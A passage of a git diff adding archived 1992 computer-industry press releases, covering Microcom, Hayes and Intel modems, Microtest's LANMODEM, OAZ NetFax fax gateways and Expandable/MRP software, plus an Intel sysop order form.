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PC connectivity vendor, today demonstrated its +award-winning line-up of internetworking and communications solutions. Two +new high-speed V.32bis modems, the portable MicroPorte 4232bis and the +standalone QX/4232bis+, were also debuted today. + +Microcom also demonstrated the following solutions at Networld. + +ù Microcom Bridge/Router + +The MBR/6000 transparently bridges and routes traffic on 16/4 MB Token Ring +or Ethernet LANs. The MBR connects LANs at local sites and at remote +locations over leased lines. + +Communications Software For Windows + +ù Carbon Copy for Windows provides remote control between PCs running +Windows applications. Carbon Copy for Windows supports VGA, EGA, CGA, +Hercules and most Super VGA and video modes. + +ù RELAY Gold for Windows enables PC-to-mainframe communications supporting +up to 15 multiple sessions. RELAY Gold provides file transfer, terminal +emulation and true PC-to-IBM connectivity. + +ù MicroCourier offers complete communications at a very low price. Users +can connect to other PCs, bulletin boards and on-line services such as +CompuServe. + +Communications Software For DOS + +ù Carbon Copy Plus is the leading remote control and communications product +for PCs. Carbon Copy links keyboards over a LAN or via modem and standard +telephone lines. + +ù RELAY Gold fulfills the need for reliable PC-to-mainframe, PC-to-mini and +PC-to-PC communications. RELAY supports virtually any physical connection +including coax boards, gateways, Token Ring TIC, synchronous and +asynchronous dial-up. + +ù RELAY Gateway provides an economical connection between multiple PCs on a +LAN to a mainframe. Three versions support a variety of connections +between NetBIOS or Novell IPX LANs to IBM hosts. + +Microcom MNP 10 Modems + +ù HDMS provides comprehensive means to conveniently expand dial-up modem +network capacity with an efficient central site management and security +system. HDMS supports up to 32 High Density V.32bis modems featuring +sophisticated management reports, event logs and four layers of +dial-access security. + +ù QX/4232bis+ V.32bis desktop modem delivers throughputs up to 57, 000 bps. +This full-featured modem also provides 2-wire dial and 4-wire leased line +operation protected by multiple security modems. + +ù MicroPorte 4232bis portable modem offers V.32bis speeds up to 38,400 bps. +Like all new Microcom modems, the MicroPorte 4232bis features MNP 10 for +reliable operation over both poor quality land lines and cellular links. + +-------------------------------------------------------- + +MICROCOM DEBUTS INDUSTRY'S FIRST V.32bis PORTABLE MODEM + +MicroPorte 4232bis Supports Data Communication Over Cellular and Land-lines +with MNP 10 Adverse Channel Enhancements + +BOSTON, MA (Networld Booth #1508), FEBRUARY 11, 1992 -- Microcom), Inc., +(Norwood, MA) developer of MNP (Microcom Networking Protocol), today +debuted the MicroPorte 4232bis, the industry's first V.32bis portable +modem. With V.32bis, the MicroPorte 4232bis yields high-speed throughputs +up to 38,400 bps on land-based lines reducing modem connect time, +resulting in substantial line cost savings. In keeping with the Company's +strategy, the MicroPorte 4232bis supports MNP 10 providing enhanced data +transmission reliability over both dial-up and cellular connections. + +The MicroPorte 4232bis has a footprint about the size of an index card, +weighs 10 ounces, and supports the advanced modem features users have come +to expect from Microcom's premium desktop modems. + +"The MicroPorte 4232bis is the only high-speed portable modem that enables +users to communicate virtually anywhere," says Stephen P. Mank, Microcom's +Vice President of Marketing. "Supporting communication over cellular is +particularly important to the increasing number of laptop, notebook, +palmtop and pen computer users who require mobile communication +capabilities. With MNP 10, their connect times are shorter and +communication links more reliable." + +Microcom's MNP 10 gives the MicroPorte 4232bis user a better chance to get +connected and stay connected over poor quality cellular and land-based +links. MNP 10 incorporates four unique functions called Adverse Channel +Enhancements (ACE) that regulate modem speed and packet sizes, optimizing +data transfer under virtually any conditions. MNP 10 initiates a call at +1200 bps, the most robust level, then upshifts to the highest possible +line speed. Throughout the call, MNP 10 monitors various line parameters +and aggressively adapts packet size and shifts modem speed, upward or +downward, providing optimum data throughput. + +In addition to supporting CCITT V.32bis modulation standards and MNP 10, +the MicroPorte 4232bis also supports MNP 2-4 error control, MNP 5 and +V.42bis data compression, and other modulation standards, including V.32 +(9600), V.22bis (2400), V.22 (1200 bps), Bell 212A (1200 bps) and Bell 103 +(300 bps). + +The MicroPorte 4232bis includes an AC power pack and rechargeable +batteries. Fully charged batteries provide 1.5 hours of connect time. Auto +shut-off conserves battery life when the MicroPorte is not in use. For +mobile computing, users can purchase an optional 12-volt DC adapter that +plugs into a standard automobile cigarette lighter. + +Shipping to authorized Microcom resellers in March 1992, the MicroPorte +4232bis will have a list price of $899. + +-------------------------------------------------------- + +BOSTON, MA (Networld Booth #1508), February 11, 1992--Microcom, Inc., +(Norwood, MA) developer of the Microcom Networking Protocol (MNP), the de +facto modem standard, today debuted the QX/4232bis+, the newest member of +its V.32bis modem family. The QX/4232bis+ is ideally suited for users of +high-power PCs and larger systems requiring very high throughput, solid +security and error-free transmission over dial-up or leased lines. + +Enabling users to transfer data at speeds up to 57,600 bps, the QX/4232bis+ +eliminates performance bottlenecks that frequently occur when running +complex applications with slower modems. The high-speed QX/4232bis+ also +provides the throughput users require for data-intensive applications +running on midrange, mainframe and supercomputers. + +In addition to 2-wire dial-up operation, the QX/4232bis+ supports 4-wire +leased lines. This preserves users' modem investments as the QX/4232bis+ +is compatible with most 4-wire modems. + +If the leased line connection is disrupted, the QX/4232bis+ automatically +switches to a 2-wire dial backup. While in backup mode, the modem +continually monitors the leased line and switches back to 4-wire operation +when the line is restored. Throughout the backup process, the QX/4232bis+ +maintains complete data integrity. + +Since many large computer systems are installed in banks, financial +institutions and Fortune 1000 corporations, Microcom designed the +QX/4232bis+ with multiple security modes to protect sensitive financial +and technical data. Sophisticated security features enable users to +program a security database for up to 20 users, selecting fixed dial-back, +variable dial-back or pass-through security, depending upon the user's +needs. Other security features are also provided. + +For both synchronous and asynchronous operation, the QX/4232bis+ provides +CCITT V.25bis dialing commands. This feature is particularly valuable to +users of IBM AS/400 systems, which commonly support V.25bis dialing. + +Following its strategy of providing high-performance capabilities in its +modems, Microcom also includes MNP 10 in the QX/4232bis+. MNP 10 provides +users with an effective solution for communicating data over cellular +networks and other adverse channels such as noisy land lines. MNP 10 +enhances modem connectability and adjusts packet size and modem speed to +optimize performance of the QX/4232bis+. + +Other features provided in the QX/4232bis+ include + +ù Auto Logon +. PCS Security +ù Multiple Configurations +. UUCP/Kermit Spoofing +ù Remote Access +ù Auto Dial-back On Loss of Carrier + +Microcom will ship the QX/4232bis+ to authorized dealers by the end of +January 1992. The modem will have a list price of $1099. + +Microcom's other V.32bis modems include the QX/4232bis desktop model and +the recently announced MicroPorte 4232bis portable modem. Both include MNP +10 and provide speeds up to 38,400 bps. + +Microcom, 500 River Ridge Dr, Norwood, MA 02062 +617-551-1000 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/microtst.txt b/textfiles.com/computers/PRESSRELEASE/microtst.txt new file mode 100644 index 00000000..12ea1d1c --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/microtst.txt @@ -0,0 +1,80 @@ +(Phoenix, Arizona, February 11, 1992)--Computing in the nineties is +changing fast. With more and more organizations increasing their reliance +on Local Area Networks (LANs), the expanding popularity of notebook and +laptop computers, and the growing trend toward telecommuting, effective +computing no longer just means a PC on your desk in the office. + +LANs are taking over the way businesses compute. Studies indicate that +56.8% of all PCs in use will be connected to a LAN by 1995. International +Data Corporation (IDC) predicts the demand for LAN-based dial out will +increase as the number of PCs on LANs worldwide increases. + +In addition IDC states that, "the number of portable PCs (including +notebooks, laptops, and transportables) shipping worldwide will increase +from 3.9 million in 1991 to 9.6 million in 1995." With this growth in the +portable PC market comes an increasing need for remote access to the LAN. + +Market research firm, Link Resources, says 4.3 million company employees +work at home now. That figure is expected to increase as companies +continue to find that higher productivity and employee satisfaction are +the positive results of their telecommuting policies. + +In response to all of these trends and growing user concern with the +complexity of LAN-to-WAN connectivity, LANMODEM provides a simple +solution. LANMODEM is a V.32bis/ V.42bis (14.4K baud modem with up to 4x +data compression) network-attachable modem, which operates at speeds up to +57.6K baud. + +It is an intelligent plug-and-play network modem designed to give users +high speed access to, from and between Novell LANs. LANMODEM provides a +direct connection to the LAN cabling, giving remote users the ability to +log in to their office network from home, their hotel room, or wherever +they may be. LANMODEM lets them run applications such as E-mail, +groupware, word processing programs, graphics packages, etc., exactly as +if they were attached directly to the network. Additionally, remote users +can transfer files, print documents or..take remote control of a network +PC. + +As the popularity of telecommuting increases, so does the need for +realistic tools which permit employees to work efficiently and +effectively, believes David Bolles, company founder and CEO, who designed +LANMODEM with telecommuting in mind. "I think technology has a +responsibility to attempt to solve some of our environmental problems. +More and more, companies are willing to work with their employees to +permit them to work out of their home. LANMODEM is their easy-to-use +dial-in solution. Additionally it solves a need for employees traveling on +business to access their office networks." + +LANMODEM attaches directly to the network and allows network users in the +office to share modems to dial out to electronic information services. In +addition, LANMODEM features an additional serial port permitting another +modem to be attached, giving multiple users the ability to dial in and out +simultaneously, avoiding the need for dedicated modems and extra +telecommunications lines. + +LANMODEM, ($1,995 Ethernet Version), was announced late in 1991, and is +currently in final beta testing. It will ship in March. + +Microtest Inc. designs, manufactures and markets innovative solutions for +users of computer networks, pioneering several firsts in both network +diagnostic and connectivity products. Since the introduction of Cable +Scanner, the first hand-held cable testing tool, in 1988, Microtest's +products have captured national recognition in the industry, including +winning several "Product of the Year" awards. The LANPORT connectivity +product line of dedicated applications servers, introduced in 1989, gave +network users the ability for the first time to share printers and modems +without a dedicated computer. + +Microtest, 3519 East Shea Blvd, Suite 134, Phoenix, AZ 85028 +602-971-6464 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/mrp44.txt b/textfiles.com/computers/PRESSRELEASE/mrp44.txt new file mode 100644 index 00000000..d3fc2c5e --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/mrp44.txt @@ -0,0 +1,49 @@ +BOSTON, MASSACHUSETTS, FEBRUARY 10,1992 -- Expandable Software, Inc., a +market leader of integrated factory and financial management software on +PC-LANs, today announced its new release 4.4. Over sixty new features were +incorporated. Major ease of use enhancements include pop-up help (user +modifiable) with point-and-shoot selection of valid values, hot-keys jump +users to other related programs or inquires from any prompt, and over 100+ +drill-down inquires. The new release also supports companies requiring +sales and financial reporting by product line. This release will be +provided free to all Expandable/MRP users under their standard maintenance +contract. + +Release 4.4 also includes a major new module, Lot Tracking. This +significant addition to the Expandable/MRP system lists for $3,000. Aimed +at companies that require part traceability where material must be tracked +by lot number, batch number, or serial number, the Lot Tracking module +provides complete tracking of a part and its lot/serial number information +from the time it is purchased or manufactured until it is consumed or +shipped. Features include traceability of parts as they are received, +cycle counted, kit issued to work orders or jobs, backflush issued, +completed and or shipped. + +Marshall Guile, president and CEO of Expandable Software said, '"The new +Lot Tracking module provides optimum downward (lot source) and upward (lot +consumption) traceability required by companies with either FDA or serial +number traceability requirements. Lot Tracking also provides capabilities +to help a firm improve its quality control and save a firm unnecessary +write-offs because of lot expiration date control." + +The Expandable/MRP system manages manufacturing (MRP II), financial, and +order management information for manufacturing companies. Feature rich and +completely integrated, it employs fourth-generation relational data base +technology and runs on IBM's AIX and in a variety of PC/LAN environments. +Because Expandable/MRP is an open-ended, total solution for manufacturing +management, --- and one that combines affordability with great power --, +the Expandable system on AIX and LANs has emerged as the premier +manufacturing software product of the 90s. + +Expandable Software can be reached at: 408-261-7880 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/oaz.txt b/textfiles.com/computers/PRESSRELEASE/oaz.txt new file mode 100644 index 00000000..47d6ecee --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/oaz.txt @@ -0,0 +1,106 @@ +Boston, MA, February 11, 1992 -- OAZ Communications today announced the +availability of NetFax Director systems software, the newest member of the +NetFax Open family of Fax gateways for Novell NetWare local area networks +(LANs). The NetFax Open Systems are based on an "open architecture" +platform, the same technology as OAZ's OEM product which is utilized by +the leading long distance carriers ensuring compatibility with Fax +standards worldwide. + +NetFax Director software runs on the NetFax Manager Fax gateway hardware +and transforms an IBM PC or compatible into a Fax gateway. Up to Four +NetFax boards can be configured in a NetFax Fax gateway. The NetFax Open +architecture allows a multi-line server to send and receive Faxes +concurrently plus provides unlimited expandability allowing multiple +gateways to be added per LAN. + +NetFax Director can be run with NetFax DOS or NetFax Windows user +interfaces or any MHS compatible E-Mail package. This "open architecture +provides users with unsurpassed ease of use. + +The NetFax Director also provides an application program interface (API) +that simplifies the integration of NetFax with vertical application +programs for VARs targeting specific markets such as insurance, medical, +and legal, banking/finance and manufacturing. + +NetFax Director delivers advanced features including: Completely automated +inbound routing via DID (direct inward dialing) or semi-automatic DTMF +(touch-tone decoding) routing to deliver Faxes directly to the recipient's +PC; Fax Broadcasting up to two thousand using personal or global +directories; Attachment of up to 64 computer files or scanned documents; +Support for new fonts; HP LaserJet 2P and III printer support; HP ScanJet +scanner support; 180 degree rotation for viewing faxes; Real-time +conversion of outbound faxes. + +OAZ incorporated many powerful features into NetFax Director for network +managers. OAZ developed an easy installation program plus comprehensive +step-by-step documentation for administrators and users. Additionally, +network managers are provided with the most comprehensive management +utilities available, including: Fax queue manipulation to prioritize +faxes; Fax scheduling including scheduling for off peak rates to achieve +line cost savings up to sixty percent; Activity log for monitoring and +reporting; departmental bill-back capabilities. + +NetFax Director is currently shipping with the NetFax Manager board plus +NetFax DOS user software for $1,995. Upgrades for O-A-Z customers to +NetFax Director are only $495. + +OAZ Communications, Fremont, CA, designs, manufactures and markets open +network Fax solutions for end-users and original equipment manufacturers +(OEMs). OAZ's exclusive open platform provides universal compatibility +with unsurpassed flexibility and power for both users and developers. OAZ +offers the industry's fastest, most powerful and most cost-effective Fax +products. OAZ's products are sold through a worldwide network of +value-added resellers (VARs) and distributors. + +-------------------------------------------------------- + +Boston, MA, February 1 1, 1 992 -- OAZ Communications today announced +NetFax for Windows, user software for the NetFax Open family of Fax +gateways for Novell NetWare local area networks (LANs). NetFax for Windows +has been designed to be fully compatible (native) with Novell's Message +Handling Service (MHS) message routing platform. + +NetFax for Windows is the first Windows Fax program for LANs which writes +Faxes directly to MHS, bypassing any gateway or font conversions. +Additionally, NetFax for Windows is the first Windows-based Fax +application that allows users to send multiple attachments. + +NetFax for Windows provides "ultra-easy" Fax capability - allowing users to +Fax as easily as printing a document. Users can Fax from within any +Windows PC application by simply selecting the "NetFax" option from their +print menu. Plus, NetFax for Windows takes full advantage of the scalable +fonts of Adobe Type Manager from Adobe Systems and Face Lift from +Bitstream, providing the maximum possible resolution for Faxed messages. + +Additional NetFax for Windows features include: Windows 3.1 compatibility; +Attachment of multiple files while print capturing from applications; +Creation of broadcast group out of the active phone book; Elimination of +redundant conversions via file caching during broadcasts; Import and +export of telephone databases (ASCII). + +NetFax for Windows user interface software runs with NetFax Director Fax +gateway software and the NetFax Manager Fax gateway hardware. NetFax for +Windows will be available in April. Prices range from $395.00 for eight +users, $495.00 for 100 users, to $595.00 for 500 users. + +OAZ Communications, Fremont, CA, designs, manufactures and markets open +network Fax solutions for end-users and original equipment manufacturers +(OEMs). OAZ's exclusive open platform provides universal compatibility +with unsurpassed flexibility and power for both users and developers. OAZ +offers the industry's fastest, most powerful and most cost-effective Fax +products. OAZ's products are sold through a worldwide network of +value-added resellers (VARs) and distributors. + +OAZ Communications, 44290 Osgood Rd, Fremont, CA 94539 +510-226-0171 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/offer.txt b/textfiles.com/computers/PRESSRELEASE/offer.txt new file mode 100644 index 00000000..a24efdc7 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/offer.txt @@ -0,0 +1,216 @@ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ INTEL FAXMODEMS NOW OFFERED ³ + ³ IN SYSOP PROGRAM! ³ + ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +After PC Magazine's most intensive modem evaluation in years, the Intel +14.4EX tied for "Editors Choice" honors with AT&T. The AT&T modem is more +than double the price of the Intel 14.4EX, making Intel's modem the clear +winner. Intel has combined this technology with our award winning +SatisFAXtion modems to bring you a new line of faxmodems. The best of the +bunch will be offered at special pricing to Sysops. + +1) SatisFAXtion Modem/400 - an internal V.32bis, coprocessed + faxmodem with a V.32bis modem, Smart Line sharing and + Smart UART. Supports CAS compatible applications. + +2) SatisFAXtion Modem/400e; an external V.32bis faxmodem. + Supports CAS and Class 1 fax interfaces. + + [For more informaton, download the appropriate online + literature]. + + Common features of the 14.4EX, SatisFAXtion Modem/400 and 400e: + -V.32bis/V.32 speeds of 14.4K, 12K, 9.6K, 7.2K and 4.8Kbps. + -V.42bis, V.42 and MNP 5 data compression and error control. + -Automatic speed optimization. The modem monitors line + noise and falls back and/or forward to insure the maximum + throughput. These speed changes happen in less than 200ms! + -Adaptive handshaking. The 14.4EX samples the phone line + BEFORE the connection is made to maximize throughput. + -Quick connection option. The modem can be configured to + connect with other Intel modems in as little as six + seconds (vs the normal 12-16 seconds). Even if you're + connecting to a non-Intel modem, the connection time can be + cut to eight seconds. (NOTE: noisy phone lines will affect + the performance of this option). + -Automatic leased line restoration. In the event of carrier + loss on a leased line, the modem can be setup to automatically + attempt to re-establish the connection. + -Small form factor. Our external high speed modems are + packaged in the same metal case as our 2400bps modem, + reducing space requirements. + -Free communications software from Crosstalk. Each modem + comes with a free copy of "Communicator by Crosstalk". + This is the full $99 retail package which includes 13 + terminal emulators and 8 file transfer protocols - including + ZMODEM. + -Status lights display connection speeds between 1200 and + 14,400bps and when error control and data compression + connections have been made (externals only) + -Maximum DTE rate = 115.2Kbps + + TO QUALIFY FOR THIS OFFER: + [] You must currently be operating a bulletin board system. + [] Purchase is for bulletin board use only -- not for resale. + [] The modem must be used on the BBS at least one year + before removal. + [] Bulletin board must display a message on user sign + on declaring an Intel 14.4EX or SatisFAXtion Modem/400 + (or 400e) in use. + + NOTE: + o Due to local market approval requirements, this + offer is only available in North America. + o This is a special limited offer from Intel. Intel + reserves the right to discontinue or alter the offer + at any time. + + + PAYMENT TERMS: + We accept Visa, Mastercard, American Express, Cashier + check or money order. + + SHIPPING AND HANDLING (please allow 2-4 weeks for delivery): $15/unit + + OTHER CHARGES: + State sales tax must be included where applicable (or + provide a tax exemption number). + + -------------------------------------------------------- + + SYSOP ORDER FORM -- INTEL MODEMS + (Effective: 7/31/92) + + + NAME _____________________________________ + + COMPANY __________________________________ + + MAIL SLOT_________________________________ + + ADDRESS___________________________________ + + CITY____________________STATE____ZIP______ + + + SHIPPING ADDRESS (IF DIFFERENT FROM ABOVE): + + ___________________________________________ + + ___________________________________________ + + ___________________________________________ + Voice phone number: + + _____________________________________ + BBS phone number(s): + + ________________________________________________ + + ________________________________________________ + + ________________________________________________ + + ________________________________________________ + Name and address of your BBS: + + ________________________________________________ + + ________________________________________________ + + ________________________________________________ + How long has your BBS been in operation? + + ________________________________________________ + Hours of BBS operation: + + ________________________________________________ + If you are a member of a network (eg. FidoNet, + Usenet, etc.) list addresses: + + ________________________________________________ + + ________________________________________________ + Average number of calls per month: + + ________________________________________________ + BBS software used: + + ________________________________________________ + Processor used on BBS computer: + + ________________________________________________ + Brands and speeds of modems you now use: + + ________________________________________________ + + ________________________________________________ + + ________________________________________________ + Account number, name and password for Intel (so we can + log into your system for verification): + + ________________________________________________ + + ________________________________________________ + + ________________________________________________ + +------------------------------------------------------------------------- + MODEL LIST SYSOP TOTAL + PRICE PRICE + + 14.4EX (ext) $549 $269 ________ + * SatisFAXtion Modem/400e (ext) $549 $279 ________ + SatisFAXtion Modem/400 (int) $499 $249 ________ + + SUB TOTAL (Quantity X Price) ________ + (Limit 4) +*Available the end of August + + STATE SALES TAX (Subtotal X State Tax %) ________ + (or enter tax exemption number here) + + SHIPPING & HANDLING ($15/unit) ________ + (Please allow 2-4 weeks for delivery) + + TOTAL ________ + + CREDIT CARD NUMBER: VISA:_______________ + MASTERCARD:_______________ + AMERICAN EXPRESS:_______________ + EXPIRATION DATE:_______________ + + + + -------------------------------------------------------- + My signature below shows that I have read and + understand the terms of this agreement. + + [] You must currently be operating a bulletin board system. + [] Modem purchased is for bulletin board use only -- not for + resale. + [] The modem must be used on the BBS at least one year + before removal. + [] Bulletin board must display a message on user sign + on declaring an Intel 14.4EX of SatisFAXtion Modem/400 + (or 400e) in use. + + + PURCHASER SIGNATURE:__________________________ + + + -------------------------------------------------------- + + FAX THIS FORM AND CREDIT CARD NUMBER TO: + INTEL SYSOP SPECIAL OFFER + at (503) 228-9707 + + *OR* + + MAIL YOUR ORDER TO: + + INTEL SYSOP PROGRAM + PO BOX 10723 + PORTLAND, OR 97210 diff --git a/textfiles.com/computers/PRESSRELEASE/optima.txt b/textfiles.com/computers/PRESSRELEASE/optima.txt new file mode 100644 index 00000000..6a6e9184 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/optima.txt @@ -0,0 +1,68 @@ +ATLANTA, GA, 20 January 1992 -- Hayes Microcomputer Products, Inc. today +announced immediate availability of Smartmodem OPTIMA 2400 (OPTIMA 24), a +cost effective solution for business and personal communications that +provides CCITT V.42 error-control and V.42 bis data compression for data +throughput up to 9600 bps. Hayes also lowered the price of Smartmodem +OPTIMA 9600 (OPTIMA 96), a CCITT V.32 modem, by approximately 20 percent. + +OPTIMA 24 supports CCITT V.22 bis (2400 bps), CCITT V.22 (1200 bps), as +well as industry standards 103 (300 bps) and 212A (1200 bps). OPTIMA 24 +communicates asynchronously and synchronously, as well as supports Hayes +AutoSync, a standard Smartmodem feature that allows the modem to +communicate both asynchronously and synchronously, without using an SDLC +card. + +While Hayes does not publish an estimated retail price for OPTIMA products, +both OPTIMA 24 and OPTIMA 96 are available to the distribution channel at +an aggressive price that encourages a market price well below that of +competitive products. The current advertised price range of OPTIMA 24 is +$149 to $199, while the current advertised price range of OPTIMA 96 is +$349 to $429. Prices may vary based on the level of value-added service a +reseller provides to their customers. + +"At Hayes, we believe we should be our own best competitor. With OPTIMA 24, +we reinforce our commitment to providing the latest technology to all +sectors of the communications market," said Hayes President Dennis C. +Hayes. "If you liked the price of OPTIMA 96 in 1991, you'll love the price +of both OPTIMA 96 and OPTIMA 24 in 1992. OPTIMA 24 offers a perfect +migration for companies that have standardized on Smartmodem 2400 and now +want data compression and error-control." + +OPTIMA 24 and OPTIMA 96 come bundled with Smartcom EZ communications +software and a special $35 upgrade offer for Smartcom Exec as well as +valuable information services coupons. + +Smartcom EZ is a simple-to-use communications software program that enables +users to access PCs and on-line or BBS services. Smartcom EZ provides +easy-to-follow menus and phone book entries to store frequently called +numbers, keyboard macros, extensive on-line help screens and Autotype, +which enables users to transfer text files effortlessly. Furthermore, the +XMODEM protocol allows users to send or receive data files error-free +between locations. + +Both OPTIMA 24 and OPTIMA 96 are available in the U.S. and Canada, and +carry a two year limited performance warranty. While OPTIMA 96 is +currently available throughout Latin America, Hayes anticipates the +approval and availability of OPTIMA 24 in Latin America over the next few +months. + +Best known as the leader in microcomputer modems, Hayes develops, supplies +and supports computer communications equipment and software for personal +computer and computer communications networks. The company distributes its +products through an international network of authorized distributors, +dealers, mass merchants and original equipment manufacturers. + +Hayes Microcomputer Products Inc +PO Box 105203, Atlanta, GA 30348 +404-441-1617 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/optima14.fax b/textfiles.com/computers/PRESSRELEASE/optima14.fax new file mode 100644 index 00000000..a7b95374 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/optima14.fax @@ -0,0 +1,83 @@ +HAYES MICROCOMPUTER PRODUCTS, INC. +P.O. Box 105203 +Atlanta, Georgia 30348 +Press Inquiries: 404/840-9200 +Customer Service: 404/441-1617 +Fax: 404/441-1238 FOR IMMEDIATE RELEASE +Angie Ciarloni/Peggy Ballard H-1292+++AT + + HAYES INTRODUCES SMARTMODEM OPTIMA DATA + FAX MODEM + AND SMARTCOM FAX Software + - - - - - - + Smartmodem OPTIMA 144 Data Modem Announced + + ATLANTA, GA, 18 May 1992 -- Hayes Microcomputer Products, Inc. +today announced Hayes OPTIMA 144 + FAX144, a data + fax modem that +supports CCITT V.32 bis and CCITT V.42 bis for data throughput of up to +57,600 bit/s and CCITT Group 3 Fax standard V.17 for 14,400 bit/s. In +addition, Hayes also announced Hayes OPTIMA 144, a data modem that +supports CCITT V.32 bis and CCITT V.42 bis. + + Hayes OPTIMA 144 + FAX144, available for an estimated retail +topprie of US$519 and CDN$699, comes bundled with free Smartcom FAX +communications software and Smartcom EZ data communications software. +Smartcom FAX is a TSR program that allows users to fax documents directly +from their computer, as well as receive fax messages and then view, +rotate, flip, print or save to disk. Smartcom FAX also keeps detailed +Transaction Logs in files on disk, so that both send and receive fax +activities may be viewed at any time. + + OPTIMA 144, a cost-effective, high-speed data modem, is designed +for users whose applications do not require fax communications. +OPTIMA 144 comes packaged with free Smartcom EZ communications software +for an estimated retail price of US$479 and CDN$649. + + OPTIMA 144 and OPTIMA 144 + FAX144 supports CCITT V.32 bis +(14,400 bit/s), CCITT V.32 (9600 bit/s), V.22 bis (2400 bit/s) and V.22 +(1200 bit/s), as well as industry standards 103 (300 bit/s) and 212A (1200 +bit/s) for data communications. These modems communicate asynchronously +and synchronously, and support Hayes AutoSync, a standard Smartmodem +feature that allows the system's asynchronous communications port to +transmit data synchronously, eliminating the need for an SDLC or Bisync +card. These products, which are manufactured in Norcross, Ga., will be +available in the Americas Region, including the U.S., Canada, Mexico, +Argentina, Chile and Venezuela in third quarter 1992. +top + "Sending or receiving fax messages around the world without +leaving your computer is no longer just another convenience in businesses +today for many applications it is an essential part of communications," +said Hayes President Dennis C. Hayes. "Now no matter what your needs are, +you have everything in one modem asynchronous or synchronous data +communications as well as fax capabilities. With OPTIMA 144 you have the +advantage of additional cost savings for the highest standardized speed +available for PC modem communications." + + All OPTIMA products carry a two year limited performance +warranty. A special offer by Hayes, available in the U.S. and Canada +only, allows users to obtain a free extension of the limited performance +warranty to a total of five years coverage when one of these OPTIMA +products is registered within 90 days of purchase by mail or by using +Online With Hayes, Hayes Bulletin Board System, in the U.S. and Canada at +800/US HAYES or 404/729-6525 (Atlanta ISDN users). + + Hayes provides high-quality customer support through applications +consultants and technical support engineers through Hayes Customer Service +in the U.S. at 404/441-1617 and in Canada at 519/746-5000, as well as +24-hour electronic support throughout the Americas Region at 404/HI MODEM, +via Online with Hayes. In Latin America, Hayes also provides customer and +toptechnical support through authorized service distributors. (See attached +for additional distribution and support information for the Americas +Region.) + + Best known as the leader in microcomputer modems, Hayes develops, +supplies and supports computer communications equipment and software for +personal computer and computer communications networks. The company +distributes its products in over 60 countries through a global network of +authorized distributors, dealers, VARs, systems integrators and original +equipment manufacturers. + + ### + + + + \ No newline at end of file diff --git a/textfiles.com/computers/PRESSRELEASE/otc800.txt b/textfiles.com/computers/PRESSRELEASE/otc800.txt new file mode 100644 index 00000000..c271b478 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/otc800.txt @@ -0,0 +1,48 @@ +February 10, 1991, Boston, MA - Output Technology Corporation (OUTPUT) is +demonstrating its new 800 cps office printer with a wide range of standard +features, plus flexible paper handling capabilities. The MTP is designed +for office printing jobs, as well as document-on-demand, point-of-sale, +and graphics applications. + +"The MTP is really a multiple task printer," said John Lugviel, OUTPUT's +Vice President of Marketing and Sales. "It has excellent paper handling +capabilities, and because of this, it can do a lot of jobs that the +typical printer just can't handle. For businesses that need a single +printer to handle a wide variety of applications, it's an exceptional +value at $2,195!" + +The key to the printer's versatility lies in its advanced paper handling +features. The MTP, an impact printer, has full forms capabilities, +including l-button zero tear off (eliminating forms waste), a standard +push tractor for forms up to 6 parts, and paper parking, as well as +options for a bottom feed pull tractor and a cut sheet feeder. The +printer's auto head gap automatically adjusts to a form's thickness, +completely eliminating the need for any manual adjustments. + +The MTP also excels at graphics and bar codes, and features 9 resident +fonts, more than any other printer in its class. It also has 5 resident +bar codes (Code 39, UPC-A, EAN-8, EAN-13, Interleaved 2 of 5), and +built-in color capabilities. Emulations include Epson, FX-1050, Epson +EX-1000 (color), and IBM 